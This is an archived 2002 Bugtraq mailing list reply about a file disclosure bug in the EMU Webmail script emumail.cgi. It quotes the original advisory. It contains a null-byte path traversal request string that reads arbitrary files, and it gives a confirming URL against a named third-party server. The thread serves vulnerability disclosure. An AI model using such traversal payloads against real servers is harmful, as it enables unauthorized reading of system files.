Bugtraq mailing list archives
Re: emumail.cgi
From: Tom Micklovitch <h_bugtraq () yahoo com>
Date: Fri, 5 Apr 2002 00:55:31 -0800 (PST)
--- acidneo () altern org wrote:
name : emumail.cgi date : 04/04/2002 description : EMU Webmail: how to check your email from the web. severity : Low/average-risk homepage : www.emumail.com Any user can view files on the remote system: xxx/PATH/emumail.cgi?type=FILE%00 The vendor were contact about that
confirmed on nph-emumail.cgi (see http://q1.quik.com/quikmail/nph-emumail.cgi?type=../%00) ===== -----BEGIN GEEK CODE BLOCK----- Version: 3.1 www.geekcode.com GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D- (Quake+++) G+>++ e* h r++>+++ y+(+++) -----END GEEK CODE BLOCK----- __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/
Current thread:
- emumail.cgi acidneo (Apr 04)
- Re: emumail.cgi Tom Micklovitch (Apr 05)
- Re: emumail.cgi, one more local vulnerability (not verified) Leif Jakob (Apr 10)
- <Possible follow-ups>
- Re: emumail.cgi N|ghtHawk (Apr 05)
- Re: emumail.cgi MegaHz (Apr 08)
- Re: emumail.cgi Randal L. Schwartz (Apr 09)
- Re: emumail.cgi MegaHz (Apr 08)